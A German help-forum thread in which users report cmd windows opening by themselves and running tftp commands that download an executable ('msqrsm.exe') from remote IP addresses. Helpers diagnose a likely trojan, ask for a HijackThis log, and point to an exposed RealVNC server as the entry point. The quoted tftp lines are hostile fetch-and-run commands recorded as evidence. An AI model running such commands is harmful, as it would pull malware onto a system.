CMD öffnet sich selbstständig

Hallo,
bei mir hat sich heute während einer kurzen abwesenheit ein cmd-fenster geöffnet und in dem fenster stand folgendes drin:

tftp -i 89.55.49.223 GET msqrsm.exe
Zeitüberschreitung


Hab ich einen Trojanes oder etwas ähnliches?

 

Wäre möglich.
http://de.wikipedia.org/wiki/TFTP

Die Adresse ist z.Zt. nicht erreichbar.

Mach mal bitte ein Hijackthis-Log und poste den Link zur abgespeicherten Auswertung.

 

Das kannst du laut sagen, du hast mehr Probleme als dir lieb sind..

 

Wenn das ein Trojaner ist, ist er eigentlich schlecht programmiert.
(Fenster vergessen zu verstecken)

 

Logfile of HijackThis v1.99.1
...

Log entfernt. TheDoctor

 

http://www.hijackthis.de/logfiles/d1a0f80538a095b959aeb618ee745a40.html

Fixe mal die Hosts-Einträge.

Immer wenn eine der Adressen (z.B. ebay) aufgerufen wird, werden die Daten an einen anderen Server geschickt.

 

Die Hosts einträge sind korrekt; die wurden von mir selbst so eingetragen

 

Einige IP-Adressen sind laut ripe.net nicht gültig. Sie lassen sich auch nicht anpingen. die IP-Adresse aus Deinem ersten Beitrag gehört zu Freenet:

 

Hallo,

vielleicht hat das etwas mit der Sache hier zu tun, da hattest du einen VNC Server isntalliert.. jetzt "file missing"..

O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Programme\RealVNC\VNC4\WinVNC4.exe" -service (file missing)

 

Ich hatte den gleichen Effekt
(tftp -i 62.178.183.171 GET msqrsm.exe),
obwohl NortonAntiVirus aktiv und aktuell war.

Gibt es schon neue Erkenntnisse, ausser dass ich jetzt auch ein Problem habe ?

 

Hallo,

die IP-Adresse gehört zu (Hostmaster Chello, Broadband Internet Services in Österrreich). Von dort soll die "msqrsm.exe" geladen werden. Einziger Hinweis auf diese Datei über Google .. hier:
http://www.worldspace.nu/&page=16
Da hat einer auch das Problem und beschreibt noch dass sich da etwas selbstständig macht in einem Chat. Chello.. ist das dein Provider ? In dem HiJackThis-Log von dem TO war nicht zu sehen wie und wo das FTP-Programm gestartet wird.

 

Hallo rt13_zrtnzna7qr

Die installierte Java-Version ist veraltet. Bitte deinstallieren und von http://java.sun.com/javase/downloads/index.jsp das Java Runtime Environment (JRE) 5.0 Update 8 herunterladen und installieren.

Gruß
Nevok

 

Hallo,

Ich war auch schon verzweifelt über ständig sich von alleine öffnende cmd Fenster, aus denen dann automatisch TFTP Befehlle mit GET auf Dateien wie Winsyst32.exe gestartet wurden, und dann auch noch ausgeführt wurden.

Ich habe den REALVNC Server laufen! Über diese Schnittstelle scheinen die Befehle zu kommen.

Nachdem ich die Portnummer in REALVNC geändert habe, und auch nur noch über sichere VNP Verbindungen arbeite,
war Ruhe!

Viel Grüße Klaus